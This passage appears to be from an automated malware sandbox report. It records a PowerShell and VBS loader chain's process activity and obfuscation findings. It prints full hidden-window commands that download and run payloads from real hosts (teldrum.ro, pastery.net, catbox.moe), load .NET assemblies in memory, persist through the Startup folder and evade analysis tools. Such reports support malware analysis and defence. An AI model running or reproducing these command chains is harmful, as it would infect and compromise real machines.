Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 7.2.powershell.exe.1dca82ed330.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 7.2.powershell.exe.1dca70dbb70.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 7.2.powershell.exe.1dcbf2c0000.2.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 28.2.powershell.exe.2287f090000.2.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 28.2.powershell.exe.22801af2690.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 41.2.powershell.exe.2002c7ef8e0.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 49.2.powershell.exe.26c57b12b58.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 57.2.powershell.exe.117de8f3be0.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 64.2.powershell.exe.208006e4018.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, Messages.cs	.Net Code: Memory

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA \| Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + '
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL \| Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF \| Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO \| Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA \| Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"	Jump to behavior
